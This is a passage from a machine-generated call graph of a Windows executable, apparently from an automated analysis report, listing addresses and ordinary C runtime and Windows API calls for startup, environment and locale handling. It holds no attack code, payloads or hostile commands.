45 API calls 19427 7ff6ceb41ec0 19425->19427 19426->19428 19428->19282 19429 7ff6ceb3f948 _get_daylight 11 API calls 19429->19431 19430 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19430->19431 19431->19424 19431->19429 19431->19430 19432 7ff6ceb3b25c __std_exception_copy 37 API calls 19431->19432 19433 7ff6ceb41ea5 19431->19433 19435 7ff6ceb41eba 19431->19435 19432->19431 19434 7ff6ceb3b6b8 _wfindfirst32i64 17 API calls 19433->19434 19434->19435 19435->19425 19437 7ff6ceb3a484 19436->19437 19440 7ff6ceb3a48d 19436->19440 19437->19440 19536 7ff6ceb39f4c 19437->19536 19440->19297 19440->19298 19443 7ff6ceb4738c 19442->19443 19444 7ff6ceb481e9 19442->19444 19445 7ff6ceb47399 19443->19445 19451 7ff6ceb473cf 19443->19451 19446 7ff6ceb35788 45 API calls 19444->19446 19447 7ff6ceb35cb4 _get_daylight 11 API calls 19445->19447 19466 7ff6ceb47340 19445->19466 19448 7ff6ceb4821d 19446->19448 19450 7ff6ceb473a3 19447->19450 19456 7ff6ceb48233 19448->19456 19457 7ff6ceb4824a 19448->19457 19476 7ff6ceb48222 19448->19476 19449 7ff6ceb473f9 19452 7ff6ceb35cb4 _get_daylight 11 API calls 19449->19452 19454 7ff6ceb3b698 _invalid_parameter_noinfo 37 API calls 19450->19454 19451->19449 19455 7ff6ceb4741e 19451->19455 19453 7ff6ceb473fe 19452->19453 19458 7ff6ceb3b698 _invalid_parameter_noinfo 37 API calls 19453->19458 19460 7ff6ceb473ae 19454->19460 19461 7ff6ceb47409 19455->19461 19465 7ff6ceb35788 45 API calls 19455->19465 19459 7ff6ceb35cb4 _get_daylight 11 API calls 19456->19459 19463 7ff6ceb48266 19457->19463 19464 7ff6ceb48254 19457->19464 19458->19461 19462 7ff6ceb48238 19459->19462 19460->19292 19461->19292 19467 7ff6ceb3b698 _invalid_parameter_noinfo 37 API calls 19462->19467 19469 7ff6ceb48277 19463->19469 19470 7ff6ceb4828e 19463->19470 19468 7ff6ceb35cb4 _get_daylight 11 API calls 19464->19468 19465->19461 19466->19292 19467->19476 19472 7ff6ceb48259 19468->19472 19759 7ff6ceb473dc 19469->19759 19768 7ff6ceb4a004 19470->19768 19475 7ff6ceb3b698 _invalid_parameter_noinfo 37 API calls 19472->19475 19475->19476 19476->19292 19477 7ff6ceb35cb4 _get_daylight 11 API calls 19477->19476 19479 7ff6ceb4426b 19478->19479 19480 7ff6ceb4424e 19478->19480 19482 7ff6ceb44275 19479->19482 19808 7ff6ceb48ce8 19479->19808 19480->19479 19481 7ff6ceb4425c 19480->19481 19484 7ff6ceb35cb4 _get_daylight 11 API calls 19481->19484 19815 7ff6ceb413ac 19482->19815 19486 7ff6ceb44261 __scrt_get_show_window_mode 19484->19486 19486->19316 19488 7ff6ceb35788 45 API calls 19487->19488 19489 7ff6ceb4835a 19488->19489 19490 7ff6ceb48368 19489->19490 19491 7ff6ceb3fbd4 5 API calls 19489->19491 19492 7ff6ceb35d74 14 API calls 19490->19492 19491->19490 19493 7ff6ceb483c4 19492->19493 19494 7ff6ceb48454 19493->19494 19495 7ff6ceb35788 45 API calls 19493->19495 19497 7ff6ceb48465 19494->19497 19498 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19494->19498 19496 7ff6ceb483d7 19495->19496 19500 7ff6ceb3fbd4 5 API calls 19496->19500 19503 7ff6ceb483e0 19496->19503 19499 7ff6ceb419fb 19497->19499 19501 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19497->19501 19498->19497 19499->19337 19499->19338 19500->19503 19501->19499 19502 7ff6ceb35d74 14 API calls 19504 7ff6ceb4843b 19502->19504 19503->19502 19504->19494 19505 7ff6ceb48443 SetEnvironmentVariableW 19504->19505 19505->19494 19507 7ff6ceb3a4c9 19506->19507 19508 7ff6ceb3a4c0 19506->19508 19507->19364 19507->19365 19508->19507 19827 7ff6ceb39fc0 19508->19827 19513 7ff6ceb480a9 19512->19513 19517 7ff6ceb480d6 19512->19517 19514 7ff6ceb480ae 19513->19514 19513->19517 19515 7ff6ceb35cb4 _get_daylight 11 API calls 19514->19515 19518 7ff6ceb480b3 19515->19518 19516 7ff6ceb4811a 19519 7ff6ceb35cb4 _get_daylight 11 API calls 19516->19519 19517->19516 19520 7ff6ceb48139 19517->19520 19534 7ff6ceb4810e __crtLCMapStringW 19517->19534 19521 7ff6ceb3b698 _invalid_parameter_noinfo 37 API calls 19518->19521 19522 7ff6ceb4811f 19519->19522 19523 7ff6ceb48143 19520->19523 19524 7ff6ceb48155 19520->19524 19525 7ff6ceb480be 19521->19525 19527 7ff6ceb3b698 _invalid_parameter_noinfo 37 API calls 19522->19527 19528 7ff6ceb35cb4 _get_daylight 11 API calls 19523->19528 19526 7ff6ceb35788 45 API calls 19524->19526 19525->19358 19531 7ff6ceb48162 19526->19531 19527->19534 19529 7ff6ceb48148 19528->19529 19530 7ff6ceb3b698 _invalid_parameter_noinfo 37 API calls 19529->19530 19530->19534 19531->19534 19874 7ff6ceb49bc0 19531->19874 19534->19358 19535 7ff6ceb35cb4 _get_daylight 11 API calls 19535->19534 19537 7ff6ceb39f65 19536->19537 19550 7ff6ceb39f61 19536->19550 19559 7ff6ceb43440 19537->19559 19542 7ff6ceb39f77 19544 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19542->19544 19543 7ff6ceb39f83 19585 7ff6ceb3a030 19543->19585 19544->19550 19547 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19548 7ff6ceb39faa 19547->19548 19549 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19548->19549 19549->19550 19550->19440 19551 7ff6ceb3a2a0 19550->19551 19552 7ff6ceb3a2c9 19551->19552 19557 7ff6ceb3a2e2 19551->19557 19552->19440 19553 7ff6ceb3f948 _get_daylight 11 API calls 19553->19557 19554 7ff6ceb3a372 19556 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19554->19556 19555 7ff6ceb41640 WideCharToMultiByte 19555->19557 19556->19552 19557->19552 19557->19553 19557->19554 19557->19555 19558 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19557->19558 19558->19557 19560 7ff6ceb4344d 19559->19560 19564 7ff6ceb39f6a 19559->19564 19604 7ff6ceb3bfd4 19560->19604 19565 7ff6ceb4377c GetEnvironmentStringsW 19564->19565 19566 7ff6ceb437ac 19565->19566 19567 7ff6ceb39f6f 19565->19567 19568 7ff6ceb41640 WideCharToMultiByte 19566->19568 19567->19542 19567->19543 19569 7ff6ceb437fd 19568->19569 19570 7ff6ceb43804 FreeEnvironmentStringsW 19569->19570 19571 7ff6ceb3e3ac _fread_nolock 12 API calls 19569->19571 19570->19567 19572 7ff6ceb43817 19571->19572 19573 7ff6ceb43828 19572->19573 19574 7ff6ceb4381f 19572->19574 19576 7ff6ceb41640 WideCharToMultiByte 19573->19576 19575 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19574->19575 19577 7ff6ceb43826 19575->19577 19578 7ff6ceb4384b 19576->19578 19577->19570 19579 7ff6ceb43859 19578->19579 19580 7ff6ceb4384f 19578->19580 19582 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19579->19582 19581 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19580->19581 19583 7ff6ceb43857 FreeEnvironmentStringsW 19581->19583 19582->19583 19583->19567 19586 7ff6ceb3a055 19585->19586 19587 7ff6ceb3f948 _get_daylight 11 API calls 19586->19587 19588 7ff6ceb3a08b 19587->19588 19590 7ff6ceb3a106 19588->19590 19593 7ff6ceb3f948 _get_daylight 11 API calls 19588->19593 19594 7ff6ceb3a0f5 19588->19594 19595 7ff6ceb3b25c __std_exception_copy 37 API calls 19588->19595 19598 7ff6ceb3a12b 19588->19598 19601 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19588->19601 19602 7ff6ceb3a093 19588->19602 19589 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19592 7ff6ceb39f8b 19589->19592 19591 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19590->19591 19591->19592 19592->19547 19593->19588 19753 7ff6ceb3a25c 19594->19753 19595->19588 19600 7ff6ceb3b6b8 _wfindfirst32i64 17 API calls 19598->19600 19599 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19599->19602 19603 7ff6ceb3a13e 19600->19603 19601->19588 19602->19589 19605 7ff6ceb3c000 FlsSetValue 19604->19605 19606 7ff6ceb3bfe5 FlsGetValue 19604->19606 19607 7ff6ceb3c00d 19605->19607 19608 7ff6ceb3bff2 19605->19608 19606->19608 19609 7ff6ceb3bffa 19606->19609 19611 7ff6ceb3f948 _get_daylight 11 API calls 19607->19611 19610 7ff6ceb3b2bc __CxxCallCatchBlock 45 API calls 19608->19610 19612 7ff6ceb3bff8 19608->19612 19609->19605 19613 7ff6ceb3c075 19610->19613 19614 7ff6ceb3c01c 19611->19614 19624 7ff6ceb43114 19612->19624 19615 7ff6ceb3c03a FlsSetValue 19614->19615 19616 7ff6ceb3c02a FlsSetValue 19614->19616 19618 7ff6ceb3c058 19615->19618 19619 7ff6ceb3c046 FlsSetValue 19615->19619 19617 7ff6ceb3c033 19616->19617 19620 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19617->19620 19621 7ff6ceb3bcac _get_daylight 11 API calls 19618->19621 19619->19617 19620->19608 19622 7ff6ceb3c060 19621->19622 19623 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19622->19623 19623->19612 19647 7ff6ceb43384 19624->19647 19626 7ff6ceb43149 19662 7ff6ceb42e14 19626->19662 19629 7ff6ceb3e3ac _fread_nolock 12 API calls 19630 7ff6ceb43177 19629->19630 19631 7ff6ceb4317f 19630->19631 19634 7ff6ceb4318e 19630->19634 19632 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19631->19632 19633 7ff6ceb43166 19632->19633 19633->19564 19634->19634 19669 7ff6ceb434bc 19634->19669 19637 7ff6ceb4328a 19638 7ff6ceb35cb4 _get_daylight 11 API calls 19637->19638 19640 7ff6ceb4328f 19638->19640 19639 7ff6ceb432e5 19642 7ff6ceb4334c 19639->19642 19680 7ff6ceb42c44 19639->19680 19643 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19640->19643 19641 7ff6ceb432a4 19641->19639 19644 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19641->19644 19646 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19642->19646 19643->19633 19644->19639 19646->19633 19648 7ff6ceb433a7 19647->19648 19649 7ff6ceb433b1 19648->19649 19695 7ff6ceb411a8 EnterCriticalSection 19648->19695 19652 7ff6ceb43423 19649->19652 19655 7ff6ceb3b2bc __CxxCallCatchBlock 45 API calls 19649->19655 19652->19626 19656 7ff6ceb4343b 19655->19656 19657 7ff6ceb43492 19656->19657 19659 7ff6ceb3bfd4 50 API calls 19656->19659 19657->19626 19660 7ff6ceb4347c 19659->19660 19661 7ff6ceb43114 65 API calls 19660->19661 19661->19657 19663 7ff6ceb35788 45 API calls 19662->19663 19664 7ff6ceb42e28 19663->19664 19665 7ff6ceb42e46 19664->19665 19666 7ff6ceb42e34 GetOEMCP 19664->19666 19667 7ff6ceb42e5b 19665->19667 19668 7ff6ceb42e4b GetACP 19665->19668 19666->19667 19667->19629 19667->19633 19668->19667 19670 7ff6ceb42e14 47 API calls 19669->19670 19672 7ff6ceb434e9 19670->19672 19671 7ff6ceb4363f 19674 7ff6ceb2c010 _wfindfirst32i64 8 API calls 19671->19674 19672->19671 19673 7ff6ceb43540 __scrt_get_show_window_mode 19672->19673 19675 7ff6ceb43526 IsValidCodePage 19672->19675 19696 7ff6ceb42f2c 19673->19696 19676 7ff6ceb43281 19674->19676 19675->19671 19677 7ff6ceb43537 19675->19677 19676->19637 19676->19641 19677->19673 19678 7ff6ceb43566 GetCPInfo 19677->19678 19678->19671 19678->19673 19752 7ff6ceb411a8 EnterCriticalSection 19680->19752 19697 7ff6ceb42f69 GetCPInfo 19696->19697 19698 7ff6ceb4305f 19696->19698 19697->19698 19703 7ff6ceb42f7c 19697->19703 19699 7ff6ceb2c010 _wfindfirst32i64 8 API calls 19698->19699 19700 7ff6ceb430fe 19699->19700 19700->19671 19701 7ff6ceb43c90 48 API calls 19702 7ff6ceb42ff3 19701->19702 19707 7ff6ceb48c34 19702->19707 19703->19701 19706 7ff6ceb48c34 54 API calls 19706->19698 19708 7ff6ceb35788 45 API calls 19707->19708 19709 7ff6ceb48c59 19708->19709 19712 7ff6ceb48900 19709->19712 19713 7ff6ceb48941 19712->19713 19714 7ff6ceb403f0 _fread_nolock MultiByteToWideChar 19713->19714 19718 7ff6ceb4898b 19714->19718 19715 7ff6ceb48c09 19716 7ff6ceb2c010 _wfindfirst32i64 8 API calls 19715->19716 19717 7ff6ceb43026 19716->19717 19717->19706 19718->19715 19719 7ff6ceb3e3ac _fread_nolock 12 API calls 19718->19719 19720 7ff6ceb48ac1 19718->19720 19721 7ff6ceb489c3 19718->19721 19719->19721 19720->19715 19722 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19720->19722 19721->19720 19723 7ff6ceb403f0 _fread_nolock MultiByteToWideChar 19721->19723 19722->19715 19724 7ff6ceb48a36 19723->19724 19724->19720 19743 7ff6ceb3fd94 19724->19743 19727 7ff6ceb48ad2 19730 7ff6ceb3e3ac _fread_nolock 12 API calls 19727->19730 19731 7ff6ceb48ba4 19727->19731 19733 7ff6ceb48af0 19727->19733 19728 7ff6ceb48a81 19728->19720 19729 7ff6ceb3fd94 __crtLCMapStringW 6 API calls 19728->19729 19729->19720 19730->19733 19731->19720 19732 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19731->19732 19732->19720 19733->19720 19734 7ff6ceb3fd94 __crtLCMapStringW 6 API calls 19733->19734 19735 7ff6ceb48b70 19734->19735 19735->19731 19736 7ff6ceb48ba6 19735->19736 19737 7ff6ceb48b90 19735->19737 19739 7ff6ceb41640 WideCharToMultiByte 19736->19739 19738 7ff6ceb41640 WideCharToMultiByte 19737->19738 19740 7ff6ceb48b9e 19738->19740 19739->19740 19740->19731 19741 7ff6ceb48bbe 19740->19741 19741->19720 19742 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19741->19742 19742->19720 19744 7ff6ceb3f9c0 __crtLCMapStringW 5 API calls 19743->19744 19745 7ff6ceb3fdd2 19744->19745 19746 7ff6ceb3fdda 19745->19746 19749 7ff6ceb3fe80 19745->19749 19746->19720 19746->19727 19746->19728 19748 7ff6ceb3fe43 LCMapStringW 19748->19746 19750 7ff6ceb3f9c0 __crtLCMapStringW 5 API calls 19749->19750 19751 7ff6ceb3feae __crtLCMapStringW 19750->19751 19751->19748 19757 7ff6ceb3a261 19753->19757 19758 7ff6ceb3a0fd 19753->19758 19754 7ff6ceb3a28a 19756 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19754->19756 19755 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19755->19757 19756->19758 19757->19754 19757->19755 19758->19599 19760 7ff6ceb473f9 19759->19760 19761 7ff6ceb47410 19759->19761 19762 7ff6ceb35cb4 _get_daylight 11 API calls 19760->19762 19761->19760 19764 7ff6ceb4741e 19761->19764 19763 7ff6ceb473fe 19762->19763 19765 7ff6ceb3b698 _invalid_parameter_noinfo 37 API calls 19763->19765 19766 7ff6ceb35788 45 API calls 19764->19766 19767 7ff6ceb47409 19764->19767 19765->19767 19766->19767 19767->19476 19769 7ff6ceb35788 45 API calls 19768->19769 19770 7ff6ceb4a029 19769->19770 19773 7ff6ceb49c80 19770->19773 19775 7ff6ceb49cce 19773->19775 19774 7ff6ceb2c010 _wfindfirst32i64 8 API calls 19776 7ff6ceb482b5 19774->19776 19777 7ff6ceb49d55 19775->19777 19779 7ff6ceb49d40 GetCPInfo 19775->19779 19782 7ff6ceb49d59 19775->19782 19776->19476 19776->19477 19778 7ff6ceb403f0 _fread_nolock MultiByteToWideChar 19777->19778 19777->19782 19780 7ff6ceb49ded 19778->19780 19779->19777 19779->19782 19781 7ff6ceb3e3ac _fread_nolock 12 API calls 19780->19781 19780->19782 19783 7ff6ceb49e24 19780->19783 19781->19783 19782->19774 19783->19782 19784 7ff6ceb403f0 _fread_nolock MultiByteToWideChar 19783->19784 19785 7ff6ceb49e92 19784->19785 19786 7ff6ceb49f74 19785->19786 19787 7ff6ceb403f0 _fread_nolock MultiByteToWideChar 19785->19787 19786->19782 19788 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19786->19788 19789 7ff6ceb49eb8 19787->19789 19788->19782 19789->19786 19790 7ff6ceb3e3ac _fread_nolock 12 API calls 19789->19790 19791 7ff6ceb49ee5 19789->19791 19790->19791 19791->19786 19792 7ff6ceb403f0 _fread_nolock MultiByteToWideChar 19791->19792 19793 7ff6ceb49f5c 19792->19793 19794 7ff6ceb49f7c 19793->19794 19795 7ff6ceb49f62 19793->19795 19802 7ff6ceb3fc18 19794->19802 19795->19786 19797 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19795->19797 19797->19786 19799 7ff6ceb49fbb 19799->19782 19801 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19799->19801 19800 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19800->19799 19801->19782 19803 7ff6ceb3f9c0 __crtLCMapStringW 5 API calls 19802->19803 19804 7ff6ceb3fc56 19803->19804 19805 7ff6ceb3fc5e 19804->19805 19806 7ff6ceb3fe80 __crtLCMapStringW 5 API calls 19804->19806 19805->19799 19805->19800 19807 7ff6ceb3fcc7 CompareStringW 19806->19807 19807->19805 19809 7ff6ceb48d0a HeapSize 19808->19809 19810 7ff6ceb48cf1 19808->19810 19811 7ff6ceb35cb4 _get_daylight 11 API calls 19810->19811 19812 7ff6ceb48cf6 19811->19812 19813 7ff6ceb3b698 _invalid_parameter_noinfo 37 API calls 19812->19813 19814 7ff6ceb48d01 19813->19814 19814->19482 19816 7ff6ceb413cb 19815->19816 19817 7ff6ceb413c1 19815->19817 19819 7ff6ceb413d0 19816->19819 19825 7ff6ceb413d7 _get_daylight 19816->19825 19818 7ff6ceb3e3ac _fread_nolock 12 API calls 19817->19818 19823 7ff6ceb413c9 19818->19823 19820 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19819->19820 19820->19823 19821 7ff6ceb413dd 19824 7ff6ceb35cb4 _get_daylight 11 API calls 19821->19824 19822 7ff6ceb4140a HeapReAlloc 19822->19823 19822->19825 19823->19486 19824->19823 19825->19821 19825->19822 19826 7ff6ceb443e0 _get_daylight 2 API calls 19825->19826 19826->19825 19828 7ff6ceb39fd9 19827->19828 19835 7ff6ceb39fd5 19827->19835 19848 7ff6ceb4388c GetEnvironmentStringsW 19828->19848 19831 7ff6ceb39fe6 19833 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19831->19833 19832 7ff6ceb39ff2 19855 7ff6ceb3a140 19832->19855 19833->19835 19835->19507 19840 7ff6ceb3a380 19835->19840 19837 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19838 7ff6ceb3a019 19837->19838 19839 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19838->19839 19839->19835 19841 7ff6ceb3a3a3 19840->19841 19846 7ff6ceb3a3ba 19840->19846 19841->19507 19842 7ff6ceb403f0 MultiByteToWideChar _fread_nolock 19842->19846 19843 7ff6ceb3f948 _get_daylight 11 API calls 19843->19846 19844 7ff6ceb3a42e 19845 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19844->19845 19845->19841 19846->19841 19846->19842 19846->19843 19846->19844 19847 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19846->19847 19847->19846 19849 7ff6ceb438b0 19848->19849 19850 7ff6ceb39fde 19848->19850 19851 7ff6ceb3e3ac _fread_nolock 12 API calls 19849->19851 19850->19831 19850->19832 19853 7ff6ceb438e7 memcpy_s 19851->19853 19852 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19854 7ff6ceb43907 FreeEnvironmentStringsW 19852->19854 19853->19852 19854->19850 19856 7ff6ceb3a168 19855->19856 19857 7ff6ceb3f948 _get_daylight 11 API calls 19856->19857 19869 7ff6ceb3a1a3 19857->19869 19858 7ff6ceb3a1ab 19859 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19858->19859 19860 7ff6ceb39ffa 19859->19860 19860->19837 19861 7ff6ceb3a225 19862 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19861->19862 19862->19860 19863 7ff6ceb3f948 _get_daylight 11 API calls 19863->19869 19864 7ff6ceb3a214 19866 7ff6ceb3a25c 11 API calls 19864->19866 19865 7ff6ceb41344 _wfindfirst32i64 37 API calls 19865->19869 19867 7ff6ceb3a21c 19866->19867 19870 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19867->19870 19868 7ff6ceb3a248 19872 7ff6ceb3b6b8 _wfindfirst32i64 17 API calls 19868->19872 19869->19858 19869->19861 19869->19863 19869->19864 19869->19865 19869->19868 19871 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19869->19871 19870->19858 19871->19869 19873 7ff6ceb3a25a 19872->19873 19875 7ff6ceb49be9 __crtLCMapStringW 19874->19875 19876 7ff6ceb4819e 19875->19876 19877 7ff6ceb3fc18 6 API calls 19875->19877 19876->19534 19876->19535 19877->19876 20900 7ff6ceb4bea9 20901 7ff6ceb4beb8 20900->20901 20902 7ff6ceb4bec2 20900->20902 20904 7ff6ceb41208 LeaveCriticalSection 20901->20904 16123 7ff6ceb2c3cc 16144 7ff6ceb2c59c 16123->16144 16126 7ff6ceb2c518 16248 7ff6ceb2c8bc IsProcessorFeaturePresent 16126->16248 16127 7ff6ceb2c3e8 __scrt_acquire_startup_lock 16129 7ff6ceb2c522 16127->16129 16134 7ff6ceb2c406 __scrt_release_startup_lock 16127->16134 16130 7ff6ceb2c8bc 7 API calls 16129->16130 16132 7ff6ceb2c52d __CxxCallCatchBlock 16130->16132 16131 7ff6ceb2c42b 16133 7ff6ceb2c4b1 16150 7ff6ceb2ca04 16133->16150 16134->16131 16134->16133 16237 7ff6ceb3a8e0 16134->16237 16136 7ff6ceb2c4b6 16153 7ff6ceb21000 16136->16153 16141 7ff6ceb2c4d9 16141->16132 16244 7ff6ceb2c720 16141->16244 16145 7ff6ceb2c5a4 16144->16145 16146 7ff6ceb2c5b0 __scrt_dllmain_crt_thread_attach 16145->16146 16147 7ff6ceb2c3e0 16146->16147 16148 7ff6ceb2c5bd 16146->16148 16147->16126 16147->16127 16148->16147 16255 7ff6ceb2d1c0 16148->16255 16282 7ff6ceb4b580 16150->16282 16154 7ff6ceb2100b 16153->16154 16284 7ff6ceb289b0 16154->16284 16156 7ff6ceb2101d 16291 7ff6ceb366e8 16156->16291 16158 7ff6ceb239ab 16298 7ff6ceb21ea0 16158->16298 16164 7ff6ceb239ca 16231 7ff6ceb23ab2 16164->16231 16323 7ff6ceb27d70 16164->16323 16166 7ff6ceb239ff 16167 7ff6ceb23a4b 16166->16167 16169 7ff6ceb27d70 61 API calls 16166->16169 16338 7ff6ceb28250 16167->16338 16173 7ff6ceb23a20 __std_exception_destroy 16169->16173 16170 7ff6ceb23a60 16342 7ff6ceb21ca0 16170->16342 16173->16167 16177 7ff6ceb28250 58 API calls 16173->16177 16174 7ff6ceb23b2d 16176 7ff6ceb23b8d 16174->16176 16361 7ff6ceb28b80 16174->16361 16175 7ff6ceb21ca0 121 API calls 16178 7ff6ceb23a96 16175->16178 16183 7ff6ceb23bdb 16176->16183 16176->16231 16385 7ff6ceb28de0 16176->16385 16177->16167 16181 7ff6ceb23ab7 16178->16181 16182 7ff6ceb23a9a 16178->16182 16181->16174 16474 7ff6ceb24060 16181->16474 16461 7ff6ceb22b10 16182->16461 16399 7ff6ceb26ff0 16183->16399 16184 7ff6ceb23bc0 16189 7ff6ceb23bce SetDllDirectoryW 16184->16189 16190 7ff6ceb23b53 16184->16190 16189->16183 16195 7ff6ceb22b10 59 API calls 16190->16195 16194 7ff6ceb23ad5 16201 7ff6ceb22b10 59 API calls 16194->16201 16195->16231 16198 7ff6ceb23bf5 16224 7ff6ceb23c27 16198->16224 16515 7ff6ceb26800 16198->16515 16199 7ff6ceb23b03 16199->16174 16202 7ff6ceb23b08 16199->16202 16200 7ff6ceb23d11 16403 7ff6ceb234a0 16200->16403 16201->16231 16493 7ff6ceb3097c 16202->16493 16208 7ff6ceb23c46 16217 7ff6ceb23c88 16208->16217 16551 7ff6ceb21ee0 16208->16551 16209 7ff6ceb23c29 16213 7ff6ceb26a50 FreeLibrary 16209->16213 16211 7ff6ceb23cb9 PostMessageW GetMessageW 16212 7ff6ceb23cdc 16211->16212 16555 7ff6ceb23440 16212->16555 16213->16224 16216 7ff6ceb23d2b 16411 7ff6ceb281e0 16216->16411 16217->16211 16217->16212 16217->16231 16222 7ff6ceb23d3e 16225 7ff6ceb27d70 61 API calls 16222->16225 16224->16200 16224->16208 16227 7ff6ceb23d4a 16225->16227 16226 7ff6ceb23cec 16228 7ff6ceb26a50 FreeLibrary 16226->16228 16229 7ff6ceb23d57 PostMessageW GetMessageW 16227->16229 16230 7ff6ceb23d7a 16227->16230 16228->16231 16229->16230 16497 7ff6ceb2c010 16231->16497 16238 7ff6ceb3a918 16237->16238 16239 7ff6ceb3a8f7 16237->16239 19208 7ff6ceb3b188 16238->19208 16239->16133 16242 7ff6ceb2ca48 GetModuleHandleW 16243 7ff6ceb2ca59 16242->16243 16243->16141 16245 7ff6ceb2c731 16244->16245 16246 7ff6ceb2c4f0 16245->16246 16247 7ff6ceb2d1c0 7 API calls 16245->16247 16246->16131 16247->16246 16249 7ff6ceb2c8e2 _wfindfirst32i64 __scrt_get_show_window_mode 16248->16249 16250 7ff6ceb2c901 RtlCaptureContext RtlLookupFunctionEntry 16249->16250 16251 7ff6ceb2c966 __scrt_get_show_window_mode 16250->16251 16252 7ff6ceb2c92a RtlVirtualUnwind 16250->16252 16253 7ff6ceb2c998 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16251->16253 16252->16251 16254 7ff6ceb2c9e6 _wfindfirst32i64 16253->16254 16254->16129 16256 7ff6ceb2d1c8 16255->16256 16257 7ff6ceb2d1d2 16255->16257 16261 7ff6ceb2d564 16256->16261 16257->16147 16262 7ff6ceb2d1cd 16261->16262 16263 7ff6ceb2d573 16261->16263 16265 7ff6ceb2d5d0 16262->16265 16269 7ff6ceb2e560 16263->16269 16266 7ff6ceb2d5fb 16265->16266 16267 7ff6ceb2d5de DeleteCriticalSection 16266->16267 16268 7ff6ceb2d5ff 16266->16268 16267->16266 16268->16257 16273 7ff6ceb2e3c8 16269->16273 16274 7ff6ceb2e4b2 TlsFree 16273->16274 16279 7ff6ceb2e40c __vcrt_InitializeCriticalSectionEx 16273->16279 16275 7ff6ceb2e43a LoadLibraryExW 16276 7ff6ceb2e4d9 16275->16276 16277 7ff6ceb2e45b GetLastError 16275->16277 16278 7ff6ceb2e4f9 GetProcAddress 16276->16278 16280 7ff6ceb2e4f0 FreeLibrary 16276->16280 16277->16279 16278->16274 16279->16274 16279->16275 16279->16278 16281 7ff6ceb2e47d LoadLibraryExW 16279->16281 16280->16278 16281->16276 16281->16279 16283 7ff6ceb2ca1b GetStartupInfoW 16282->16283 16283->16136 16286 7ff6ceb289cf 16284->16286 16285 7ff6ceb28a20 WideCharToMultiByte 16285->16286 16288 7ff6ceb28ac6 16285->16288 16286->16285 16286->16288 16289 7ff6ceb28a74 WideCharToMultiByte 16286->16289 16290 7ff6ceb289d7 __std_exception_destroy 16286->16290 16589 7ff6ceb229c0 16288->16589 16289->16286 16289->16288 16290->16156 16292 7ff6ceb40840 16291->16292 16293 7ff6ceb40893 16292->16293 16295 7ff6ceb408e6 16292->16295 16294 7ff6ceb3b5cc _invalid_parameter_noinfo 37 API calls 16293->16294 16297 7ff6ceb408bc 16294->16297 17094 7ff6ceb40718 16295->17094 16297->16158 16299 7ff6ceb21eb5 16298->16299 16300 7ff6ceb21ed0 16299->16300 17102 7ff6ceb22870 16299->17102 16300->16231 16302 7ff6ceb23f00 16300->16302 16303 7ff6ceb2bfb0 16302->16303 16304 7ff6ceb23f0c GetModuleFileNameW 16303->16304 16305 7ff6ceb23f3e 16304->16305 16306 7ff6ceb23f55 16304->16306 16307 7ff6ceb229c0 57 API calls 16305->16307 17142 7ff6ceb28ef0 16306->17142 16309 7ff6ceb23f51 16307->16309 16313 7ff6ceb2c010 _wfindfirst32i64 8 API calls 16309->16313 16311 7ff6ceb23f80 17153 7ff6ceb240e0 16311->17153 16312 7ff6ceb23f70 16314 7ff6ceb22b10 59 API calls 16312->16314 16316 7ff6ceb23fd9 16313->16316 16314->16309 16316->16164 16318 7ff6ceb21ee0 49 API calls 16319 7ff6ceb23fa5 16318->16319 16319->16309 16320 